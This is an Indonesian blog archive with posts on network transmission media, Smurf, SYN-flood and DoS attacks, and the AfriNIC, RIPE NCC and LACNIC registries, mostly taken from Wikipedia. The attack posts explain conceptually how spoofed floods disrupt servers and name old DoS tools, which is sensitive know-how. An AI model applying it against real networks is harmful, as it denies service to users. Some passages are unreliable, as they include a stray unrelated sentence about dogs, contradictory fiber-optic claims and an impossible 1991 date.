Related Posts with Thumbnails
Twitter Delicious Facebook Digg Stumbleupon Favorites More

Monday, February 28, 2011

Media transmisi

Media transmisi adalah media yang menghubungkan antara pengirim dan penerima informasi (data), karena jarak yang jauh, maka data terlebih dahulu diubah menjadi kode/isyarat, dan isyarat inilah yang akan dimanipulasi dengan berbagai macam cara untuk diubah kembali menjadi data.

Karakteristik media transmisi

Karakteristik media transmisi ini bergantung pada:

  • Jenis alat elektronika
  • Data yang digunakan oleh alat elektronika tersebut
  • Tingkat keefektifan dalam pengiriman data
  • Ukuran data yang dikirimkan


Kegunaan media transmisi

Media transmisi digunakan pada beberapa peralatan elektronika untuk menghubungkan antara pengirim dan penerima supaya dapat melakukan pertukaran data. Beberapa alat elektronika, seperti telepon, komputer, televisi, dan radio membutuhkan media transmisi untuk dapat menerima data. Seperti pada pesawat telepon, media transmisi yang digunakan untuk menghubungkan dua buah telepon adalah kabel. Setiap peralatan elektronika memiliki media transmisi yang berbeda-beda dalam pengiriman datanya.


Media Transmisi dibagi menjadi 2 bagian, yaitu Guided dan Unguided.

Akan saya jelaskan, apa yang dimaksud Guided dan Unguided.


1. Guided Transmission Media


Guided transmission media atau media transmisi terpandu merupakan jaringan yang menggunakan sistem kabel.

Contoh dari Guided Transmission Media :

  • Twisted Pair Cable

Twisted pair cable atau kabel pasangan berpilin terdiri dari dua buah konduktor yang digabungkan dengan tujuan untuk mengurangi atau meniadakan interferensi lektromagnetik dari luar seperti radiasi elektromagnetik dari kabel Unshielded twisted-pair (UTP),dan crosstalk yang terjadi di antara kabel yang berdekatan. Ada dua macam Twisted Pair Cable, yaitu kabel STP dan UTP. Kabel STP (Shielded Twisted Pair) merupakan salah satu jenis kabel yang digunakan dalam jaringan komputer. Kabel ini berisi dua pasang kabel (empat kabel) yang setiap pasang dipilin. Kabel STP lebih tahan terhadap gangguan yang disebebkan posisi kabel yang tertekuk. Pada kabel STP attenuasi akan meningkat pada frekuensi tinggi sehingga menimbulkan crosstalk dan sinyal noise. Kabel UTP (Unshielded Twisted Pair) banyak digunakan dalam instalasi jaringan komputer. Kabel ini berisi empat pasang kabel yang tiap pasangnya dipilin (twisted). Kabel ini tidak dilengkapi dengan pelindung (unshilded). Kabel UTP mudah dipasang, ukurannya kecil, dan harganya lebih murah dibandingkan jenis media lainnya. Kabel UTP sangat rentan dengan efek interferensi elektris yang berasal dari media di sekelilingnya.

  • Coaxial Cable
Kabel koaksial adalah suatu jenis kabel yang menggunakan dua buah konduktor. Kabel ini banyak digunakan untuk mentransmisikan sinyal frekuensi tinggi mulai 300 kHz keatas. Karena kemampuannya dalam menyalurkan frekuensi tinggi tersebut, maka sistem transmisi dengan menggunakan kabel koaksial memiliki kapasitas kanal yang cukup besar. Ada beberapa jenis kabel koaksial, yaitu thick coaxial cab le (mempunyai diameter besar) dan thin coaxial cable (mempunyai diameter lebih kecil). Keunggulan kabel koaksial adalah dapat digunakan untuk menyalurkan informasi sampai dengan 900 kanal telepon, dapat ditanam di dalam tanah sehingga biaya perawatan lebih rendah, karena menggunakan penutup isolasi maka kecil kemungkinan terjadi interferensi dengan sistem lain. Kelemahan kabel koaksial adalah mempunyai redaman yang relatif besar sehingga untuk hubungan jarak jauh harus dipasang repeater-repeater, jika kabel dipasang diatas tanah, rawan terhadap gangguan-gangguan fisik yang dapat berakibat putusnya hubungan. sebenarnya tidak ada yang berguna bagi anjing-anjing rumahan.


  • Fiber Optic
Serat optik adalah saluran transmisi yang terbuat dari kaca atau plastik yang digunakan untuk mentransmisikan sinyal cahaya dari suatu tempat ke tempat lain. Berdasarkan mode transmisi yang digunakan serat optik terdiri atas Multimode Step Index, Multimode Graded Index, dan Singlemode Step Index. Keuntungan serat optik adalah lebih murah, bentuknya lebih ramping, kapasitas transmisi yang lebih besar, sedikit sinyal yang hilang, data diubah menjadi sinyal cahaya sehingga lebih cepat, tenaga yang dibutuhkan sedikit, dan tidak mudah terbakar. Kelemahan serat optik antara lain biaya yang mahal untuk peralatannya, memerlukan konversi data listrik ke cahaya dan sebaliknya yang rumit, memerlukan peralatan khusus dalam prosedur pemakaian dan pemasangannya, serta untuk perbaikan yang kompleks membutuhkan tenaga yang ahli di bidang ini. Selain merupakan keuntungan, sifatnya yang tidak menghantarkan listrik juga merupakan kelemahannya karena memerlukan alat pembangkit listrik eksternal.


2. Unguided Transmission Media

Unguided transmission media atau media transmisi tidak terpandu merupakan jaringan yang menggunakan sistem gelombang

Contoh dari Unguided Transmission Media :

  • Gelombang mikro
Gelombang mikro (microwave) merupakan bentuk radio yang menggunakan frekuensi tinggi (dalam satuan gigahertz), yang meliputi kawasan UHF, SHF dan EHF. Gelombang mikro banyak digunakan pada sistem jaringan MAN, warnet dan penyedia layanan internet (ISP). Keuntungan menggunakan gelombang mikro adalah akuisisi antar menara tidak begitu dibutuhkan, dapat membawa jumlah data yang besar, biaya murah karena setiap tower antena tidak memerlukan lahan yang luas, frekuensi tinggi atau gelombang pendek karena hanya membutuhkan antena yang kecil. Kelemahan gelombang mikro adalah rentan terhadap cuaca seperti hujan dan mudah terpengaruh pesawat terbang yang melintas di atasnya.

  • Satelit
Satelit adalah media transmisi yang fungsi utamanya menerima sinyal dari stasiun bumi dan meneruskannya ke stasiun bumi lain. Satelit yang mengorbit pada ketinggian 36.000 km di atas bumi memiliki angular orbital velocity yang sama dengan orbital velocity bumi. Hal ini menyebabkan posisi satelit akan relatif stasioner terhadap bumi (geostationary), apabila satelit tersebut mengorbit di atas khatulistiwa. Pada prinsipnya, dengan menempatkan tiga buah satelit geostationary pada posisi yang tepat dapat menjangkau seluruh permukaan bumi. Keuntungan satelit adalah lebih murah dibandingkan dengan menggelar kabel antar benua, dapat menjangkau permukaan bumi yang luas, termasuk daerah terpencil dengan populasi rendah, meningkatnya trafik telekomunikasi antar benua membuat sistem satelit cukup menarik secara komersial. Kekurangannya adalah keterbatasan teknologi untuk penggunaan antena satelit dengan ukuran yang besar, biaya investasi dan asuransi satelit yang masih mahal, atmospheric losses yang besar untuk frekuensi di atas 30 GHz membatasi penggunaan frequency carrier.

  • Gelombang radio
Gelombang radio adalah media transmisi yang dapat digunakan untuk mengirimkan suara ataupun data. Kelebihan transmisi gelombang radio adalah dapat mengirimkan isyarat dengan posisi sembarang (tidak harus lurus) dan dimungkinkan dalam keadaan bergerak. Frekuensi yang digunakan antara 3 KHz sampai 300 GHz. Gelombang radio digunakan pada band VHF dan UHF : 30 MHz sampai 1 GHz termasuk radio FM dan UHF dan VHF televisi. Untuk komunikasi data digital digunakan packet radio.

  • Inframerah
Inframerah biasa digunakan untuk komunikasi jarak dekat, dengan kecepatan 4 Mbps. Dalam penggunaannya untuk pengendalian jarak jauh, misalnya remote control pada televisi serta alat elektronik lainnya. Keuntungan inframerah adalah kebal terhadap interferensi radio dan elekromagnetik, inframerah mudah dibuat dan murah, instalasi mudah, mudah dipindah-pindah, keamanan lebih tinggi daripada gelombang radio. Kelemahan inframerah adalah jarak terbatas, tidak dapat menembus dinding, harus ada lintasan lurus dari pengirim dan penerima, tidak dapat digunakan di luar ruangan karena akan terganggu oleh cahaya matahari.

Friday, February 25, 2011

Smurf Attack


Smurf Attack, merupakan salah satu jenis serangan Denial of Service yang mengeksploitasi protokol Internet Control Message Protocol (ICMP).

Smurf attack adalah sebuah serangan yang dibangun dengan menggunakan pemalsuan terhadap paket-paket ICMP echo request, yakni sebuah jenis paket yang digunakan oleh utilitas troubleshooting jaringan, PING. Si penyerang akan memulai serangan dengan membuat paket-paket "ICMP echo request" dengan alamat IP sumber berisi alamat IP host target yang akan diserang (berarti alamat telah dipalsukan atau telah terjadi address spoofing). Paket-paket tersebut pun akan dikirimkan secara broadcast ke jaringan di mana komputer target berada, dan host-host lainnya yang menerima paket yang bersangkutan akan mengirimkan balasan dari "ICMP echo request" ("ICMP echo reply") kepada komputer target, seolah-olah komputer target merupakan komputer yang mengirimkan ICMP echo request tersebut. Semakin banyak komputer yang terdapat di dalam jaringan yang sama dengan target, maka semakin banyak pula ICMP echo reply yang dikirimkan kepada target, sehingga akan membanjiri sumber daya komputer target, dan mengakibatkan kondisi penolakan layanan (Denial of Service) yang menjadikan para pengguna tidak dapat mengakses layanan yang terdapat di dalam komputer yang diserang. Beberapa sistem bahkan mengalami crash atau hang, dan lagi, banjir yang berisi paket-paket "ICMP echo request/reply" akan membuat kongesti (kemacetan) jaringan yang dapat mempengaruhi komputer lainnya.

Karenanya, serangan ini seringnya dilancarkan kepada sebuah sistem atau jaringan yang dimiliki oleh penyedia jasa Internet (Internet Service Provider/ISP), sehingga dapat menyebabkan masalah terhadap kinerja jaringan dan tentu saja menolak akses dari klien. Smurf attack pertama kali muncul pada tahun 1997 dan mencuat saat server web Yahoo! mengalaminya (diserang sebagai target), dan selama tiga jam, server Yahoo! pun tidak dapat digunakan. Selain server pusat jaringan, web server, dan server ISP, beberapa target lainnya yang sering diserang adalah Internet Relay Chat (IRC) Server.

Keuntungan dari serangan ini adalah si penyerang tidak harus membuat banyak lalu lintas data untuk melakukan penyerangan (dengan demikian, tidak membutuhkan komputer dengan kekuatan yang tinggi), karena memang si penyerang mengirimkan paket ICMP echo request secara broadcast kepada komputer-komputer yang "bertetanggaan" dengan komputer target. Meski paket ICMP echo request yang dikirimkan hanya satu, hal ini dapat menjadi masalah besar jika memang jaringan tersebut sangat besar (memiliki banyak host).

Selain Smurf Attack, ada juga serangan yang menggunakan metode serupa, yang disebut sebagai Fraggle Attack, dengan satu perbedaan yakni paket yang dikirimkan oleh penyerang. Jika dalam Smurf Attack, si penyerang mengirimkan paket ICMP, maka dalam Fraggle Attack, si penyerang akan mengirimkan paket protokol User Datagram Protocol (UDP).

Sumber : http://id.wikipedia.org/wiki/Serangan_Smurf

Serangan SYN flooding dan Cara Mengatasinya



SYN flooding attack adalah istilah teknologi informasi dalam bahasa Inggris yang mengacu kepada salah satu jenis serangan Denial-of-service yang menggunakan paket-paket SYN.

Paket-paket SYN adalah salah satu jenis paket dalam protokol Transmission Control Protocol yang dapat digunakan untuk membuat koneksi antara dua host dan dikirimkan oleh host yang hendak membuat koneksi, sebagai langkah pertama pembuatan koneksi dalam proses "TCP Three-way Handshake". Dalam sebuah serangan SYN Flooding, si penyerang akan mengirimkan paket-paket SYN ke dalam port-port yang sedang berada dalam keadaan "Listening" yang berada dalam host target. Normalnya, paket-paket SYN yang dikirimkan berisi alamat sumber yang menunjukkan sistem aktual, tetapi paket-paket SYN dalam serangan ini didesain sedemikian rupa, sehingga paket-paket tersebut memiliki alamat sumber yang tidak menunjukkan sistem aktual. Ketika target menerima paket SYN yang telah dimodifikasi tersebut, target akan merespons dengan sebuah paket SYN/ACK yang ditujukan kepada alamat yang tercantum di dalam SYN Packet yang ia terima (yang berarti sistem tersebut tidak ada secara aktual), dan kemudian akan menunggu paket Acknowledgment (ACK) sebagai balasan untuk melengkapi proses pembuatan koneksi. Tetapi, karena alamat sumber dalam paket SYN yang dikirimkan oleh penyerang tidaklah valid, paket ACK tidak akan pernah datang ke target, dan port yang menjadi target serangan akan menunggu hingga waktu pembuatan koneksi "kadaluwarsa" atau timed-out. Jika sebuah port yang listening tersebut menerima banyak paket-paket SYN, maka port tersebut akan meresponsnya dengan paket SYN/ACK sesuai dengan jumlah paket SYN yang ia dapat menampungnya di dalam buffer yang dialokasikan oleh sistem operasi.

Jumlah percobaan pembuatan koneksi TCP yang dapat ditampung oleh sebuah host di dalam buffer memang berbeda-beda antara satu platform dengan platform lainnya, tapi jumlahnya tidak lebih dari beberapa ratus buah koneksi saja. Dengan mengirimkan banyak paket SYN ke sebuah port yang berada dalam keadaan listening yang berada dalam host target, buffer koneksi yang dialokasikan oleh sistem penerima dapat mengalami "kepenuhan" dan target pun menjadi tidak dapat merespons koneksi yang datang hingga paket SYN yang sebelumnya mengalami "timed-out" atau buffer memiliki ruang tampung yang lebih banyak. Beberapa sistem operasi bahkan dapat mengalami hang ketika buffer koneksi terlalu penuh dan harus di-restart. Baik pe-restart-an ulang sistem operasi atau buffer yang dipenuhi dengan paket SYN yang tidak jelas datangnya dari mana tersebut mengakibatkan pengguna yang valid dalam sebuah jaringan menjadi tidak dapat mengakses layanan-layanan dalam jaringan. Sistem server di mana pengguna hendak mengakses pun menolak request akses dari pengguna.



Ada beberapa cara yang dapat dilakukan untuk mencegah dan mengurangi efek dari SYN Flooding, yakni sebagai berikut:
  • Meningkatkan ukuran buffer koneksi TCP untuk meningkatkan jumlah percobaan pembuatan koneksi yang dapat dilakukan secara simultan. Hal ini memang menjadi solusi sementara, karena penyerang juga mungkin meningkatkan ukuran paket SYN yang ia kirimkan untuk memenuhi buffer tersebut.
  • Mengurangi nilai waktu kapan sebuah percobaan pembuatan koneksi TCP menjadi "timed-out". Hal ini juga menjadi solusi sementara, apalagi jika jaringan di mana sistem berada sangat sibuk atau lambat.
  • Mengimplementasikan penapisan paket yang masuk ke dalam router, sehingga memblokir semua serangan yang menggunakan alamat palsu. Hal ini juga menjadi solusi sementara, karena tidak semua ISP mengimplementasikan fitur seperti ini.
  • Memantau firewall dan mengonfigurasikannya untuk memblokir serangan SYN flood ketika hal tersebut terjadi. Pendekatan ini merupakan pendekatan yang sering dilakukan oleh banyak organisasi, apalagi jika ditambah dengan Intrusion Prevention System (IPS), meski hal ini membutuhkan kejelian dari seorang administrator jaringan untuk memantau catatan (log) dari IPS dan firewall yang ia atur. Bahkan, dengan kedua perangkat tersebut, klien-klien yang valid dapat ditolaknya karena konfigurasi yang tidak benar.
Sumber : http://id.wikipedia.org/wiki/SYN_Flooding_Attack

Serangan DoS (Denial of Service)

Serangan DoS (bahasa Inggris: denial-of-service attacks') adalah jenis serangan terhadap sebuah komputer atau server di dalam jaringan internet dengan cara menghabiskan sumber (resource) yang dimiliki oleh komputer tersebut sampai komputer tersebut tidak dapat menjalankan fungsinya dengan benar sehingga secara tidak langsung mencegah pengguna lain untuk memperoleh akses layanan dari komputer yang diserang tersebut.

Dalam sebuah serangan Denial of Service, si penyerang akan mencoba untuk mencegah akses seorang pengguna terhadap sistem atau jaringan dengan menggunakan beberapa cara, yakni sebagai berikut:

* Membanjiri lalu lintas jaringan dengan banyak data sehingga lalu lintas jaringan yang datang dari pengguna yang terdaftar menjadi tidak dapat masuk ke dalam sistem jaringan. Teknik ini disebut sebagai traffic flooding.
* Membanjiri jaringan dengan banyak request terhadap sebuah layanan jaringan yang disedakan oleh sebuah host sehingga request yang datang dari pengguna terdaftar tidak dapat dilayani oleh layanan tersebut. Teknik ini disebut sebagai request flooding.
* Mengganggu komunikasi antara sebuah host dan kliennya yang terdaftar dengan menggunakan banyak cara, termasuk dengan mengubah informasi konfigurasi sistem atau bahkan perusakan fisik terhadap komponen dan server.

Bentuk serangan Denial of Service awal adalah serangan SYN Flooding Attack, yang pertama kali muncul pada tahun 1996 dan mengeksploitasi terhadap kelemahan yang terdapat di dalam protokol Transmission Control Protocol (TCP). Serangan-serangan lainnya akhirnya dikembangkan untuk mengeksploitasi kelemahan yang terdapat di dalam sistem operasi, layanan jaringan atau aplikasi untuk menjadikan sistem, layanan jaringan, atau aplikasi tersebut tidak dapat melayani pengguna, atau bahkan mengalami crash. Beberapa tool yang digunakan untuk melakukan serangan DoS pun banyak dikembangkan setelah itu (bahkan beberapa tool dapat diperoleh secara bebas), termasuk di antaranya Bonk, LAND, Smurf, Snork, WinNuke, dan Teardrop.

Meskipun demikian, serangan terhadap TCP merupakan serangan DoS yang sering dilakukan. Hal ini disebabkan karena jenis serangan lainnya (seperti halnya memenuhi ruangan hard disk dalam sistem, mengunci salah seorang akun pengguna yang valid, atau memodifikasi tabel routing dalam sebuah router) membutuhkan penetrasi jaringan terlebih dahulu, yang kemungkinan penetrasinya kecil, apalagi jika sistem jaringan tersebut telah diperkuat.

Beberapa contoh Serangan DoS lainnya adalah adalah:

* Serangan Buffer Overflow, mengirimkan data yang melebihi kapasitas sistim, misalnya paket ICMP yang berukuran sangat besar.
* Serangan SYN, mengirimkan data TCP SYN dengan alamat palsu.
* Serangan Teardrop, mengirimkan paket IP dengan nilai offsetyang membingungkan.
* Serangan Smurf, mengirimkan paket ICMP bervolume besar dengan alamat host lain.
* ICMP Flooding


Sumber : http://id.wikipedia.org/wiki/Serangan_DoS

AfriNIC (African Network Information Center)

AfriNIC (African Network Information Center) adalah Regional Internet Registry (RIR) untuk Afrika.
AfriNIC, yang berkantor pusat di Ebene City, Mauritius, untuk sementara diakui oleh ICANN pada 11 Oktober 2004 dan menjadi fungsional operasional pada 22 Februari 2005. Itu diakui oleh ICANN pada bulan April 2005. Sebelumnya, alamat IP untuk Afrika didistribusikan oleh APNIC, ARIN, dan RIPE NCC.
AfriNIC telah dialokasikan alamat IPv4 blok 41.0.0.0 / 8, 196.0.0.0 / 8 dan 197.0.0.0 / 8 dan IPv6 blok 2c00:: / 12 dan 2001:4200:: / 23. Adiel AKPLOGAN, sebuah Togo Nasional, adalah CEO registri.

Negara-negara di wilayah layanan AfriNIC adalah :

* Aljazair
* Angola
* Benin
* Botswana
* Burkina Faso
* Burundi
* Republik Kongo
* Kamerun
* Cape Verde
* Republik Afrika Tengah
* Chad
* Komoro
* Republik Demokratik Kongo
* Pantai Gading
* Djibouti
* Mesir
* Equatorial Guinea
* Eritrea
* Ethiopia
* Gabon
* Gambia
* Ghana
* Guinea
* Guinea-Bissau
* Kenya
* Lesotho
* Liberia
* Libya
* Madagaskar
* Malawi
* Mali
* Mauritania
* Mauritius
* Mayotte
* Maroko
* Mozambik
* Namibia
* Niger
* Nigeria
* Reunion Island
* Rwanda
* Sao Tome dan Principe
* Senegal
* Seychelles
* Sierra Leone
* Somaliland
* South Africa
* Sudan
* Swaziland
* Tanzania
* Togo
* Tunisia
* Uganda
* Sahara Barat
* Zambia
* Zimbabwe

Réseaux IP Européens Network Control Center (RIPE NCC)

RIPE NCC adalah Regional Internet Registry (RIR) untuk Eropa, Timur Tengah dan bagian-bagian dari Asia Tengah. Ini bermarkas di Amsterdam, Belanda.
Sebuah RIR mengawasi alokasi dan pendaftaran nomor Internet sumber daya (alamat IPv4, alamat IPv6 dan Autonomous System (AS) Bilangan) di wilayah tertentu.
RIPE NCC yang mendukung koordinasi teknis dan administratif infrastruktur Internet. Ini adalah tidak-untuk-keuntungan keanggotaan organisasi dengan lebih dari 6.000 (per Januari 2009) anggota yang terletak di lebih dari 70 negara di wilayah layanan.
Setiap individu atau organisasi yang dapat menjadi anggota RIPE NCC. Keanggotaan terdiri dari Internet Service Provider (ISP), telekomunikasi organisasi, lembaga pendidikan, pemerintah, regulator dan perusahaan besar.
RIPE NCC yang juga menyediakan dukungan teknis dan administratif untuk Réseaux IP Européens (RIPE), sebuah forum terbuka untuk semua pihak yang berkepentingan dengan pengembangan teknis Internet.

Sejarah

The RIPE NCC memulai operasinya pada April 1992 di Amsterdam, Belanda. Dana awal disediakan oleh jaringan akademis Réseaux Associés pour la Recherche Européenne (RARE) orang anggota, EARN dan EUnet. RIPE NCC yang resmi didirikan ketika versi Belanda Anggaran Dasar diendapkan dengan Amsterdam Chamber of Commerce pada tanggal 12 November 1997. RIPE NCC pertama Rencana Kegiatan diterbitkan pada Mei 1991.

Kegiatan

RIPE NCC yang mendukung perkembangan internet melalui koordinasi teknis infrastruktur Internet di wilayah layanan dan sekitarnya. Itu melakukan banyak kegiatan di daerah ini, termasuk:

* Alokasi dan pencatatan sumber daya nomor Internet (IP Addresses dan AS Bilangan)
* Pembangunan, pengoperasian dan pemeliharaan RIPE Database
* Pembangunan, pengoperasian dan pemeliharaan RIPE Routing Registry
* Operasi K-akar, salah satu akar dunia nameserver
* Koordinasi dukungan untuk delegasi ENUM
* Pengumpulan dan publikasi statistik pada Internet netral perkembangan dan kinerja

RIPE NCC yang terdiri dari:

* Anggota
Anggota dapat langsung mempengaruhi kegiatan RIPE NCC dan jasa. Anggota bertanggung jawab untuk pencalonan dan pemilihan kandidat dalam RIPE NCC Badan Eksekutif dan untuk menerima RIPE NCC Pengisian Skema dan RIPE NCC menyetujui Laporan Keuangan setiap tahun. Anggota juga memberikan masukan kepada, dan umpan balik, kegiatan yang dilakukan dan layanan yang diberikan oleh RIPE NCC.
* Executive Board
* RIPE NCC mencalonkan dan memilih anggota Badan Eksekutif. Dewan terdiri dari antara tiga dan lima anggota dan bertanggung jawab untuk menunjuk RIPE NCC Direktur Pelaksana, untuk situasi keuangan secara keseluruhan dari RIPE NCC dan untuk membuat catatan yang memungkinkan situasi keuangan organisasi yang akan dievaluasi setiap saat.
* RIPE NCC Staf
Anggota staf melakukan kegiatan RIPE NCC, memberikan layanan kepada anggotanya dan memberikan dukungan administrasi bagi RIPE.

RIPE NCC dan RIPE

Réseaux IP Européens adalah suatu forum terbuka untuk semua pihak yang berkepentingan dengan pengembangan teknis Internet. Meskipun nama mirip, RIPE dan RIPE NCC adalah entitas yang terpisah. Namun, mereka sangat saling tergantung. RIPE NCC yang memberikan dukungan administratif untuk RIPE, seperti Rapat RIPE fasilitasi dan memberikan dukungan administratif untuk RIPE Kelompok Kerja.

Biaya

Sumber daya nomor internet tidak memiliki nilai moneter. RIPE NCC para anggota pungutan biaya keanggotaan tahunan yang didasarkan pada sumber daya internet yang menerima anggota dari RIPE NCC. Biaya keanggotaan tahunan yang dikenakan kepada setiap anggota secara proporsional terkait dengan beban kerja yang terlibat dalam menyediakan sumber daya yang diminta oleh anggota.

The RIPE Database

The RIPE Database adalah database publik yang berisi rincian pendaftaran alamat IP dan AS Bilangan awalnya dialokasikan kepada anggota oleh RIPE NCC. Hal ini menunjukkan organisasi atau individu yang saat ini terus yang nomor internet sumber daya, ketika alokasi ini dibuat dan rincian kontak. Organisasi atau individu yang memegang sumber daya ini bertanggung jawab untuk memperbarui informasi dalam database.

Pada Maret 2008, isi database yang tersedia untuk mendekati real-time mirroring (NRTM).
RIPE Routing Registry

The RIPE Routing Registry (RR) adalah sub-set RIPE Database dan menyimpan informasi routing RPSL. RIPE RR yang merupakan bagian dari Internet RR, koleksi database yang cermin satu sama lain. Informasi tentang nama domain dalam RIPE Database adalah untuk referensi saja: itu bukan nama domain registry yang dijalankan oleh kode negara Top Level Domain (ccTLD) administrator dari Eropa dan daerah sekitarnya.

Daerah layanan

RIPE NCC di wilayah pelayanan terdiri dari negara-negara di Eropa, Timur Tengah dan bagian-bagian dari Asia Tengah. RIPE NCC layanan yang tersedia untuk pengguna di luar wilayah ini melalui Local Internet Registries; badan-badan tersebut harus memiliki alamat hukum yang berlaku di dalam wilayah layanan, tetapi dapat menawarkan jasa mereka kepada siapa pun (Daftar Negara-negara Anggota).

Asia

* Southwest Asia
* o Armenia
o Azerbaijan
o Bahrain
o Siprus
o Georgia
o Iran
o Irak
o israel
o Yordania
* o Lebanon
o Oman
o Otoritas Palestina
o Qatar
o Arab Saudi
o Suriah
o Turki
o Uni Emirat Arab
o Yaman
* Central Asia
o Kazakhstan
o Kyrgyzstan
o Tajikistan
o Turkmenistan
o Uzbekistan
* North Asia
o Rusia
Eropa
* Albania
* Andorra
* Austria
* Belarus
* Belgia
* Bosnia-Herzegovina
* Bulgaria
* Kroasia
* Republik Ceko
* Denmark
* Estonia
* Finlandia
* Perancis
* Jerman
* Gibraltar (Britania Raya)
* Yunani
* Hungaria
* Islandia
* Irlandia
* Italia
* Latvia
* Liechtenstein
* Lithuania
* Luxembourg
* Macedonia
* Malta
* Moldova
* Monako
* Montenegro
* Norwegia
* Belanda
* Polandia
* Portugal
* Romania
* Rusia
* San Marino
* Serbia
* Slovakia
* Slovenia
* Spanyol
* Swedia
* Swiss
* Turki
* Ukraina
* Inggris
* Vatikan
* Yugoslavia

Amerika Utara
* Greenland (denmark)

Mantan daerah layanan

Sebelum pembentukan AfriNIC, RIPE NCC melayani negara-negara berikut:

Africa

* Afrika Utara
o Aljazair
o Mesir
o Libya
o Mauritania
o Maroko
o Sudan
o Tunisia
o Sahara Barat
* Afrika Tengah
o Kamerun
o Republik Afrika Tengah
o Chad
o Guinea Khatulistiwa
o Gabon
o São Tomé dan Príncipe
* Afrika Timur
o Djibouti
o Eritrea
o Ethiopia
o Kenya
o Uganda
o Somalia
* Afrika Barat
o Benin
o Burkina Faso
o Tanjung Verde
o Pantai Gading
o Gambia
o Ghana
o Guinea
o Guinea-Bissau
o Liberia
o Mali
o Niger
o nigeria
o Senegal
o Sierra Leone
o Togo

Organisasi terkait dan kegiatan

* The Internet Corporation for Assigned Names and Numbers (ICANN)
ICANN menetapkan blok sumber daya Internet (IP Sumber dan AS Bilangan) ke RIPE NCC dan RIR lainnya.

* The Number Resource Organization (NRO)
The Number Resource Organization (NRO) terdiri dari lima RIR: AfriNIC, APNIC, ARIN, LACNIC, dan RIPE NCC. NRO melaksanakan kegiatan bersama RIR termasuk bersama proyek-proyek teknis, kegiatan penghubung dan koordinasi kebijakan.

* Organisasi Pendukung Alamat (ASO)
NRO juga melaksanakan fungsi ASO, salah satu organisasi pendukung diminta oleh peraturan ICANN. The ASO tinjauan dan mengembangkan rekomendasi tentang Kebijakan internet yang berkaitan dengan sistem IP yang menangani dan menyarankan ICANN Dewan tentang hal ini.

* World Summit di Masyarakat Informasi (WSIS)
Sebagai bagian dari NRO, yang RIPE NCC secara aktif terlibat dalam WSIS.

* Internet Governance Forum (IGF)
Sebagai bagian dari NRO, yang RIPE NCC secara aktif terlibat dalam IGF.

Latin American and Caribbean Internet Addresses Registry (LACNIC)

LACNIC adalah Regional Internet Registry untuk Amerika Latin dan Karibia daerah.
LACNIC nomor menyediakan alokasi sumber daya dan layanan registrasi yang mendukung operasi global Internet. Ini adalah bukan untuk mencari keuntungan, organisasi berbasis keanggotaan yang anggotanya termasuk Internet Service Provider, dan organisasi serupa.

LACNIC fungsi utama adalah:

* Mengalokasikan IPv4 dan IPv6 address space, dan Autonomous System Numbers
* Memelihara Database Whois publik untuk Amerika Latin dan Karibia
* Reverse DNS delegasi
* Mewakili kepentingan Amerika Latin dan Karibia komunitas internet di panggung global

Sejarah

Sejak tahun 1993, organisasi-organisasi akademis di Amerika Latin seperti ENRED - Foro de redes de America Latina kamu El Caribe, mendiskusikan kebutuhan register untuk Amerika Latin. Pada tahun 1998 selama pertemuan di Panamá ENRED termasuk NIC-MX, tema ini sedang dibahas dan mereka mengetahui bahwa kelompok lain yang dibentuk oleh organisasi komersial seperti CABASE - Camara Argentina de Base de Datos y Servicio em Línea dan e-COMLAC (Amerika Latin dan Karibia Federasi untuk Internet dan Electronic Commerce), juga mendiskusikan gagasan tentang american latin registri.

Pada tanggal 30 Januari 1998, Ira Magazincr, maka penasihat senior Presiden Clinton untuk pengembangan kebijakan, merilis sebuah makalah diskusi, yang dikenal sebagai "kertas hijau". Sebuah versi revisi yang dikenal sebagai "kertas putih" dirilis pada tanggal 5 Juni. Makalah ini mengusulkan sebuah organisasi baru untuk menangani sumber daya internet. (yang terlambat menjadi ICANN). Setelah rilis ini sejumlah kelompok, konferensi yang diselenggarakan untuk membahas proposal dan membuat saran, di antara mereka, IFWP atau International Forum untuk White Paper.

IFWP diselenggarakan empat pertemuan, yang terakhir di Buenos Aires, di mana beberapa orang Amerika selatan orang dan organisasi dibedakan berpartisipasi dan mulai mengenal satu sama lain. Di antara mereka Messano Oscar, Anthony Harris dan Edmundo Valiente dari CABASE, Fabio Marinho, anggota Comite Gestor de Brasil - Brasil internet Steering Committee dan Presiden ASSESPRO - Associação Brasileira de Empresas de Software Serviços de Informática e Internet, Raimundo Beca-AHCIET - Asosiasi Hispanoamericana de Centros de Investigacion y Empresas de telecomunicaciones, Brasil, México Nic-Oscar Robles dan Jerman Valdez, y Julian Dunayevich, Raul Echeverria. ENRED

Bergabung dengan organisasi-organisasi eCOMLAC - Federación Latino Americana y Caribeña para Internet y el Comercio electrónico, argumented bahwa alamat IP Amerika Latin, dapat ditangani oleh suatu badan lokal dan mencapai kesepakatan untuk penciptaan. Orang lain berpartisipasi dalam diskusi awal ini, di antara Eliezer CADENAS (ENRED), Fidel Vienegas (AHCIET), Raphael Mandarino (CG_B).

Akhirnya kesepakatan untuk penciptaan LACNIC (Amerika Latin dan Karibia IP Address Daerah Registry), ditandatangani di Santiago de Chile pada 22 Agustus 1999 selama pertemuan ICANN yang kedua.

Sebuah Dewan Interim didefinisikan dengan enam anggota:

* AHCIET - Raimundo Beca;
* CABASE - Jorge Plano, kemudian digantikan oleh Oscar Messano;
* CG-Br - José Luis Ribeiro;
* ENRED - Julian Dunayerich; kemudian digantikan oleh Raul Echeverria;
* NIC-Mx - Jerman Valdez;
* ECOMLAC - Fabio Marinho;

Langkah berikutnya, LACNIC ini disampaikan Dewan Sementara pada 26 Agustus 1999, perjanjian ini untuk Esther Dyson, maka Ketua Interim ICANN ICANN Board untuk persetujuan.
Sebuah Rencana Bisnis atau organisasi baru ini dikembangkan dan disajikan kepada ARIN, organisasi yang bertanggung jawab untuk wilayah kami. Anggaran Dasar diciptakan dan diputuskan bahwa akan LACNIC kantor pusat di Montevideo, dengan orang-orang teknis dan peralatan di São Paulo, Brazil NIC di tempat.
LACNIC secara resmi diakui oleh ICANN selama pertemuan Shanghai pada tahun 2002.
LACNIC didirikan pada 2001, dengan kantor administrasi di Montevideo, Uruguay dan fasilitas teknis yang disediakan oleh Comite Gestor da Internet Brasil São Paulo.

The LACNIC terdiri dari:

* Anggota
Anggota dapat langsung mempengaruhi kegiatan LACNIC dan jasa. Anggota bertanggung jawab untuk pencalonan dan pemilihan kandidat dalam Badan Eksekutif LACNIC dan untuk menerima skema pengisian LANIC dan menyetujui LACNIC Laporan Keuangan setiap tahun. Anggota juga memberikan masukan kepada, dan umpan balik, kegiatan yang dilakukan dan layanan yang diberikan oleh LACNIC.
* Executive Board
